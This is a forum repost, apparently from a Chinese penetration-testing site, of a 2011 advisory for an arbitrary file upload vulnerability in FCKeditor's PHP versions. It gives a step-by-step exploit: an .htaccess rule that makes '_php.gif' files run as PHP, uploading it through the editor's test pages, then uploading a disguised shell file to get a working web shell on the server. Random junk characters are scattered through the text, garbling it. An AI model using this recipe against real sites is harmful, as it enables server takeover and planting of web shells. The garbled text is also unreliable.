FCKeditor所有php版本Upload上传漏洞+ \& b9 k6 ^& Q/ M! u& b+ p# N7 J 作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07 减小字体 增大字体6 b7 g K/ ?1 _8 [" ^2 V* R [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability# [0 L1 [ Q! M5 i- y1 J [+] Date: 2011: H( v1 u' Z( B$ B% d) t* S3 r [+] Author : sinesafe.cn) v8 J, v: l1 d$ Q, D+ j* y [+] Website : WwW.sinesafe.cn ——————————————————— 1.create a htaccess file: code: <FilesMatch “_php.gif”>7 \! d$ J; Q" L% ]2 J SetHandler application/x-httpd-php </FilesMatch> / k5 y. x) q @) X7 G 2.Now upload this htaccess with FCKeditor.1 M; i) {2 r1 } http://www.sinesafe.cn/FCKeditor ... er/upload/test.html; N n( c# L: i, t http://www.sinesafe.cn/FCKeditor ... onnectors/test.html4 r/ b0 E" t# w$ L/ Z& W5 W+ N 9 n$ `- n1 i, |3 ]% g ———————————————————————————————-7 v. {0 p% C' Z+ ^$ | 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically. 5.http://www.sinesafe.cn/anything/shell_php.gif 6.Now shell is available from server. |
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |